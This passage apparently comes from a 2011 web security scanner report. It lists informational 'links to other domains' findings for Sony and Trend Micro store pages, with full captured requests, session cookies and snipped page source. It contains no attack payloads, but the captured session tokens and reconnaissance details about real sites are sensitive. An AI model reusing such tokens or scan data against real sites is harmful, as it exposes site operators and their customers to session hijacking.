bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fsearch%2F%3Fq%3Dxss%26search.x%3D2%26search.y%3D10%26search%3Dsearch%22%2C%22r%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fhome%2F%22%2C%22t%22%3A1315350988973%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%3Fp%3D12640%22%2C%22l%22%3A%22XSS%20Methods%20Also%20Seen%20Being%20Used%20in%20Mass%20Compromises%22%2C%22rb%22%3A%221%22%2C%22ri%22%3A%221%22%2C%22de%22%3A%7B%22ti%22%3A%22Search%22%2C%22nw%22%3A393%2C%22nl%22%3A141%7D%7D

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 02 Dec 2010 03:50:59 GMT
ETag: "18c4d1-2c1-49665546aeec0"
Accept-Ranges: bytes
Content-Length: 705
Content-Type: application/x-javascript
Date: Tue, 06 Sep 2011 18:16:27 GMT
Connection: close

/*http://core.trac.wordpress.org/changeset/6482*/
if(typeof addLoadEvent !== 'function'){addLoadEvent=(function(){var e=[],t,s,n,i,o,d=document,w=window,r='readyState',c='onreadystatechange',x=functi
...[SNIP]...
1;clearInterval(t);while(i=e.shift())i();if(s)s[c]=''};return function(f){if(n)return f();if(!e[0]){d.addEventListener&&d.addEventListener("DOMContentLoaded",x,false);/*@cc_on@*//*@if(@_win32)d.write("<script id=__ie_onload defer src=//0><\/scr"+"ipt>
...[SNIP]...

12.3. http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/CategoryDisplay

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=16192&SR=nav:electronics:tv_hm_ent:bluray:shop_compare:ss HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://www.sony.com/SonySearch/Search?mode=&action=search&pst=xss+playstation&pti=0&psti=0&first=1&sti=0&st=Laptop&ti=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; WC_PERSISTENT=ImH92K9%2bsUdm%2fbC2K7x0esz36a4%3d%0a%3b2011%2d09%2d06+14%3a49%3a35%2e092%5f1315334975092%2d379806%5f0; c_m=undefinedwww.sony.comwww.sony.com; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%5D; TS5bbf46=9061f70286583c9d3554e696bebd0db0238741ed7a8234554e666b3f; mbox=session#1315352920400-736912#1315354843|PC#1315334914578-928682.19#1316562583|check#true#1315353043; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&eid=437018621; ensUID=249118483jocCbfxsy2s; s_visit=1; s_sq=%5B%5BB%5D%5D; _ensChanVal=Other|1315352981909; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.2.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_cc=true

Response

HTTP/1.1 200 OK
Cteonnt-Length: 104997
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 104997
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:49:52 GMT
Connection: close
Cache-Control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<link rel="canonical"
...[SNIP]...
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/SonyStore" target="_blank">Twitter</a></li>
<li class="socialItem"><a class="socialLogo bloggerLogo seoImage" href="http://blog.discover.sonystyle.com/" target="_blank">Blog</a></li>
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li id="sgnlSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: SGNL By Sony" href="http://discover.sonystyle.com/sgnl/#">
<h3>
...[SNIP]...
<li id="sonyCameraClubSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank">
<h3>
...[SNIP]...
<li id="twitterSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Twitter" href="http://twitter.com/SonyStore" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Facebook" href="http://www.facebook.com/sonyelectronics" target="_blank"><span class="facebookLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Twitter" href="http://www.twitter.com/SonyStore" target="_blank"><span class="twitterLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Sony Blog" href="http://blog.discover.sonystyle.com/" target="_blank"><span class="bloggerLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: YouTube" href="http://www.youtube.com/user/sonyelectronics" target="_blank"><span class="youtubeLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank"><span class="flickrLogo socialLogo">
...[SNIP]...
<div class="cta">
<a rel="Body_Tier 1_Media Remote App for iPhone/iPad CTA"
href="http://itunes.apple.com/us/app/media-remote-for-iphone/id373459732?mt=8#"
class="redArrowLink externalCTA" target="_blank">

Explore Media Remote app for iPhone/iPad
</a>
...[SNIP]...
<div class="cta">
<a href="https://market.android.com/details?id=com.sony.seconddisplay.view&feature=search_result"
class="redArrowLink externalCTA" target="_blank"
rel="Body_Tier 1_Media Remote App for Android CTA">

Explore Media Remote app for Android
</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/SonyStore" target="_blank">Twitter</a></li>
<li class="socialItem"><a class="socialLogo bloggerLogo seoImage" href="http://blog.discover.sonystyle.com/" target="_blank">Blog</a></li>
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://www.sonycreativesoftware.com/" target="_blank" id="sonyCreativeGlobalFooterLink" rel="" class="directoryListingLink">Sony Creative Software</a>
...[SNIP]...
<noscript><img src="https://sonysscom.112.2O7.net/b/ss/sonysscom/1/H.8--NS/0"
height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

12.4. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/SearchCatalog

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0 HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%2C%5B%27Sony.com%27%2C%271315352999758%27%5D%5D; _ensChanVal=Sony.com|1315352999758; c_m=undefinedwww.sony.comwww.sony.com; mbox=session#1315352920400-736912#1315354869|PC#1315334914578-928682.19#1316562609|check#true#1315353069; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898; ensUID=249118483jocCbfxsy2s; s_cc=true; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.4.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=30cc9Vvxqa6wQXKxm9IK6%2b5q3UA%3d%0a%3b2011%2d09%2d06+14%3a50%3a04%2e135%5f1315334975092%2d379806%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRPmhzB%2bzw9Hf%2fk%0avAS8zE7kY2MFDR47%2bjrT%2feKhy5Vt%2fbmyZW1xdwGzL47LAIe6LPqhTSHgSmDSMg08YS1X10MAnA%3d%3d; WC_GENERIC_ACTIVITYDATA=[1251466011%3atrue%3afalse%3a0%3aYVz6KpFhKSHbYH9BUDYIQv3N0r4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10551%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; TS5bbf46=86861eed5e5f703c738ac8ed0955e019238741ed7a8234554e666b3fdb233202e0e51d0c222f7b4e21a038ea; fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay","pv":4,"lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253Dcontent%25253AS_Blu-Ray_Disc_Player%2526pidt%253D1%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE%26sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%25253D-1%252526categoryId%25253D16192%252526SR%25253Dnav%25253Aelectronics%25253Atv_hm_ent%25253Abluray%25253Ashop_compare%25253Ass%252523%25252Fbluray%2526oid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%2526ot%253DA

Response

HTTP/1.1 200 OK
ntCoent-Length: 114876
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Tue, 06 Sep 2011 18:50:12 GMT
Content-Length: 114876
Connection: close
Vary: Accept-Encoding
Cache-Control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/SonyStore" target="_blank">Twitter</a></li>
<li class="socialItem"><a class="socialLogo bloggerLogo seoImage" href="http://blog.discover.sonystyle.com/" target="_blank">Blog</a></li>
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li id="sgnlSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: SGNL By Sony" href="http://discover.sonystyle.com/sgnl/#">
<h3>
...[SNIP]...
<li id="sonyCameraClubSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank">
<h3>
...[SNIP]...
<li id="twitterSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Twitter" href="http://twitter.com/SonyStore" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Facebook" href="http://www.facebook.com/sonyelectronics" target="_blank"><span class="facebookLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Twitter" href="http://www.twitter.com/SonyStore" target="_blank"><span class="twitterLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Sony Blog" href="http://blog.discover.sonystyle.com/" target="_blank"><span class="bloggerLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: YouTube" href="http://www.youtube.com/user/sonyelectronics" target="_blank"><span class="youtubeLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank"><span class="flickrLogo socialLogo">
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/SonyStore" target="_blank">Twitter</a></li>
<li class="socialItem"><a class="socialLogo bloggerLogo seoImage" href="http://blog.discover.sonystyle.com/" target="_blank">Blog</a></li>
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://www.sonycreativesoftware.com/" target="_blank" id="sonyCreativeGlobalFooterLink" rel="" class="directoryListingLink">Sony Creative Software</a>
...[SNIP]...
<noscript><img src="https://sonysscom.112.2O7.net/b/ss/sonysscom/1/H.8--NS/0"
height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

12.5. http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/StoreCatalogDisplay

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551 HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; TS5bbf46=959617bd472776e6829f43567043c6625f8782db79e380b64e666affd5df5daf336f8e10

Response

HTTP/1.1 200 OK
Cteonnt-Length: 75919
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 75919
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:48:32 GMT
Connection: close
Cache-Control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/SonyStore" target="_blank">Twitter</a></li>
<li class="socialItem"><a class="socialLogo bloggerLogo seoImage" href="http://blog.discover.sonystyle.com/" target="_blank">Blog</a></li>
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li id="sgnlSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: SGNL By Sony" href="http://discover.sonystyle.com/sgnl/#">
<h3>
...[SNIP]...
<li id="sonyCameraClubSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank">
<h3>
...[SNIP]...
<li id="twitterSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Twitter" href="http://twitter.com/SonyStore" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Facebook" href="http://www.facebook.com/sonyelectronics" target="_blank"><span class="facebookLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Twitter" href="http://www.twitter.com/SonyStore" target="_blank"><span class="twitterLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Sony Blog" href="http://blog.discover.sonystyle.com/" target="_blank"><span class="bloggerLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: YouTube" href="http://www.youtube.com/user/sonyelectronics" target="_blank"><span class="youtubeLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank"><span class="flickrLogo socialLogo">
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/SonyStore" target="_blank">Twitter</a></li>
<li class="socialItem"><a class="socialLogo bloggerLogo seoImage" href="http://blog.discover.sonystyle.com/" target="_blank">Blog</a></li>
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://www.sonycreativesoftware.com/" target="_blank" id="sonyCreativeGlobalFooterLink" rel="" class="directoryListingLink">Sony Creative Software</a>
...[SNIP]...
<noscript><img src="https://sonysscom.112.2O7.net/b/ss/sonysscom/1/H.8--NS/0"
height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

12.6. https://store.trendmicro.com/DRHM/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.trendmicro.com
Path:   /DRHM/store

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /DRHM/store?Action=DisplayCheckoutPaymentPage&SiteID=tmamer&Locale=en_US HTTP/1.1
Host: store.trendmicro.com
Connection: keep-alive
Referer: https://store.trendmicro.com/store?Action=DisplayPage&Locale=en_US&SiteID=tmamer&id=ShoppingCartPage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ORA_WX_SESSION="10.2.2.129:260-0#0"; JSESSIONID=74CA66C6686E81F96F871B79152A151D; VISITOR_ID=971D4E8DFAED43672BD9EDEF2E7090049E8F29A9B6FF10E6; BIGipServerp-drh-dc2pod9-pool1-active=2164392458.260.0000; __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; __qca=P0-1869591235-1315350993064; bn_u=6923713914570485926; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%22%2C%22r%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Ftrend-micro-researchers-identify-vulnerability-in-hotmail%2F%22%2C%22t%22%3A1315351267113%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fcategory%2Fpharming%2F%22%2C%22l%22%3A%22Pharming%22%2C%22de%22%3A%7B%22su%22%3A%22Malware%20blog%20by%20TrendLabs%20provides%20internet%20security%20research%20information%20on%20worms%20viruses%20trojans%20adware%20and%20other%20internet%20threats%20and%20discusses%20how%20to%20protect%20your%20computer%20data%20from%20being%20hijacked%22%2C%22ti%22%3A%22Malware%20Blog%20%7C%20TrendLabs%20-%20by%20Trend%20Micro%22%2C%22nw%22%3A1544%2C%22nl%22%3A162%7D%7D

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=24051346139,0)
Date: Tue, 06 Sep 2011 18:21:15 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app96
Content-Length: 56184


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<meta name="author" content="Trend Micro Global Web Development MUC ;-)">

<link rel="icon" href="//a248.e.akamai.net/f/248/5462/2h/www.digitalriver.com/v2.0-img/images/trend/favicon.ico" type="image/x-icon" />
<link rel="shortcut icon" href="//a248.e.akamai.net/f/248/5462/2h/www.digitalriver.com/v2.0-img/images/trend/favicon.ico" type="image/x-icon" />


   <meta name="" content="">
...[SNIP]...
<!--!/esi:include -->
<link rel="stylesheet" href="https://drh.img.digitalriver.com/store?Action=DisplayContentManagerStyleSheet&SiteID=tmamer&StyleID=1780400&StyleVersion=42&styleIncludeFile=style.css" type="text/css" media="all" />
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=2ad48102&Env=BASE&Locale=en_US&SiteID=tmamer&StyleID=1780400&StyleVersion=42&ceid=177147900&cename=TopHeader&id=CheckoutPaymentAno
...[SNIP]...
<!-- begin site specific javascript -->


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/eddy/cm/multimedia/commonFunctions.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/OT_files/tmamer_globalTrial.js"></script>


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/OT_files/tmamer_CheckoutPaymentAnonymousPage_contentBody.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/jqCookie.js"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/browser_os_detect.js"></script>
...[SNIP]...
</style>

<script src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/js/jquery.maskedinput-1.1.4.pack.js" type="text/javascript"></script>
...[SNIP]...
<a href="http://store.trendmicro.com/store"><img src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/images/images/logotrendmicro_3d_tagline_b.gif" alt="Trend Micro: Securing your Journey to the Cloud" height="50" width="305"></a>
...[SNIP]...
<div id="dr_verisign" title="This site chose VeriSign SSL for secure e-commerce and confidential communications.">
           <script src=https://seal.verisign.com/getseal?host_name=store.trendmicro.com&size=M&use_flash=YES&use_transparent=YES&lang=en></script>
...[SNIP]...
<!--Checkout-->
<img src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/images/Aug09/cartheadblack_b.gif" height="27" alt="shopping cart" />
<div class="bcBlack">
...[SNIP]...
<div id="dr_ExpandPaymentDetailsPayPalExpress">
<img src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/cc_paypal_logo.gif" border="0" align="left" valign="middle" id="dr_paypalExpressImage"> Make a payment from your new or existing PayPal account. Be sure to use your PayPal login as your order email address.
</div>
...[SNIP]...
<p><img src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/cc_mc_en_US.gif" alt="We Accept all Major Credit Cards" border="0"/></p>
...[SNIP]...
<div id="postProc" style="visibility:hidden;margin-top:-30px;">
                       <img src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/pageLoading_en_US.gif" border="0" />
                   </div>
...[SNIP]...
<a href="#" title="Close Window"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/close_en_US.gif" align="right" alt="Close Window" border="0"/></a>
...[SNIP]...
<a href="/store/defaults/en_US/DisplayDRAboutDigitalRiverPage" target="DrOverlayIframe"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/Library/images/dr_logo_0209.gif" width="115" height="27" alt="Digital River" border="0"></a>
